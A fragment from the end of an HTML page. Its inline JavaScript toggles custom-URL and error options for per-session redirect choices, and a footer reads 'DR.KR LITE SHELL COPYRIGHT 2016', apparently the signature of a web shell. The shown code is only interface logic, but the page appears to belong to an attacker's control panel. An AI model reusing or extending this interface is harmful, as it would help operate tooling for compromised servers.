const sessionIdInput = card.querySelector('input[name="session_id"]');
if (!sessionIdInput) return;
const sessionId = sessionIdInput.value;
const redirectChoices = card.querySelectorAll('input[name="redirect_choice"]');
if (redirectChoices.length > 0) {
const customUrlGroup = document.getElementById(`custom_url_group_${sessionId}`);
const errorOptions = document.getElementById(`error_options_${sessionId}`);
if (customUrlGroup && errorOptions) {
redirectChoices.forEach(choice => {
choice.addEventListener('change', function() {
if (this.value === 'custom') {
customUrlGroup.style.display = 'block';
errorOptions.style.display = 'none';
} else if (this.value === 'error') {
//customUrlGroup.style.display = 'none';
errorOptions.style.display = 'block';
} else {
//customUrlGroup.style.display = 'none';
errorOptions.style.display = 'none';
}
});
});
}
}
});
});
</script>
</body>
</html>
DR.KR LITE SHELL COPYRIGHT 2016